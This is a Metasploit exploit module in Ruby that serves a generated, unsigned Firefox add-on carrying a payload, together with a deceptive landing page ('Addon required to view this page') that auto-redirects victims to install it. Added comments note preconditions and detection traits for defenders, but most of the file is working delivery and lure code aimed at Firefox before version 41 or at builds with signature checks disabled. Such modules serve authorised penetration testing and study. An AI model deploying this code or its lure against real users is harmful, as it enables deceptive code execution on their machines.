Path: blob/master/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

# HTTP-server module that serves a generated, unsigned bootstrapped Firefox
# add-on (.xpi) together with a small landing page that points at it. Nothing
# runs unless the user accepts the browser's add-on install prompt.
#
# Reviewer notes for defenders, drawn from this module's own metadata:
# - Preconditions: Firefox before version 41, or a Nightly / Unbranded /
#   Development build with `xpinstall.signatures.required` set to `false`.
#   The generated add-on is a legacy extension, which the description says is
#   supported only before Firefox 57. Keeping signature enforcement on and the
#   browser current removes the precondition.
# - Network-visible traits: a response with Content-Type
#   `application/x-xpinstall` for a request path ending in `.xpi`, and an HTML
#   page whose meta refresh and link both target `addon.xpi`.
# - 'Notes' declares IOC_IN_LOGS, ARTIFACTS_ON_DISK and SCREEN_EFFECTS, so
#   log entries, an on-disk artifact and a visible dialog are expected.
# - Per the description, the add-on runs again after each Firefox restart
#   unless the auto-uninstall option is used.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::FirefoxAddonGenerator

  # Registers the module metadata (name, description, references, notes).
  #
  # @param info [Hash] metadata supplied by the caller and merged through
  #   `update_info`, which is defined outside this file
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution',
        'Description' => %q{
          Mozilla Firefox before version 41 allowed users to install
          unsigned browser extensions from arbitrary web servers.

          This module dynamically creates an unsigned .xpi addon file.
          The resulting bootstrapped Firefox addon is presented to
          the victim via a web page. The victim's Firefox browser
          will pop a dialog asking if they trust the addon.

          Once the user clicks "install", the addon is installed and
          executes the payload with full user permissions. As of Firefox
          4, this will work without a restart as the addon is marked to
          be "bootstrapped". As the addon will execute the payload after
          each Firefox restart, an option can be given to automatically
          uninstall the addon once the payload has been executed.

          As of Firefox 41, unsigned extensions can still be installed
          on Firefox Nightly, Unbranded and Development builds when
          configured with `xpinstall.signatures.required` set to `false`.

          Note: this module generates legacy extensions which are
          supported only in Firefox before version 57.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'mihi', 'joev' ],
        'DisclosureDate' => '2007-06-27',
        'References' => [
          [ 'URL', 'https://blog.mozilla.org/addons/2015/02/10/extension-signing-safer-experience/' ],
          [ 'URL', 'https://blog.mozilla.org/addons/2015/04/15/the-case-for-extension-signing/' ],
          [ 'URL', 'https://support.mozilla.org/en-US/kb/frequently-asked-questions-firefox-addon' ],
          [ 'URL', 'https://web.archive.org/web/20170727035940/https://developer.mozilla.org/en-US/Add-ons/Bootstrapped_extensions' ],
          [ 'URL', 'https://web.archive.org/web/20160322014439/https://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]
        ],
        'Notes' => {
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, SCREEN_EFFECTS],
          'Stability' => [CRASH_SAFE]
        }
      )
    )
  end

  # Routes one HTTP request to one of three responses, chosen from the URI:
  # a path ending in `.xpi` gets the generated add-on, a path ending in `/`
  # gets the landing page, and anything else is redirected to the
  # directory-style resource. `handler(cli)` is called afterwards on every
  # path; it is defined outside this file.
  #
  # @param cli the client handle passed in by the HTTP server mixin
  #   (type not visible here)
  # @param request the incoming request; only `request.uri` is read
  def on_request_uri(cli, request)
    if request.uri.match?(/\.xpi$/i)
      # The browser asked for the add-on archive itself.
      print_status("Sending xpi and waiting for user to click 'accept'...")
      # generate_addon_xpi is not defined in this file; presumably it comes
      # from the FirefoxAddonGenerator mixin. A falsy result means failure.
      xpi = generate_addon_xpi(cli)
      if xpi
        send_response(cli, xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
      else
        print_error("Failed to generate the payload.")
        send_not_found(cli)
      end
    elsif request.uri.match?(/\/$/)
      # Directory-style URL: serve the landing page.
      print_status("Sending HTML response.")
      send_response_html(cli, generate_html)
    else
      # First contact without a trailing slash: redirect so the relative
      # `addon.xpi` link in the landing page resolves under the resource.
      print_status("Redirecting request.")
      send_redirect(cli, "#{get_resource}/")
    end

    handler(cli)
  end

  # Builds the static landing page. It references `addon.xpi` twice: in an
  # immediate meta refresh and in a fallback "[Install]" link.
  #
  # @return [String] the complete HTML document
  def generate_html
    [
      %Q|<html><head><title>Loading, Please Wait...</title>\n|,
      %Q|<meta http-equiv="refresh" content="0; url=addon.xpi"></head>\n|,
      %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|,
      %Q|</body></html>|
    ].join
  end
end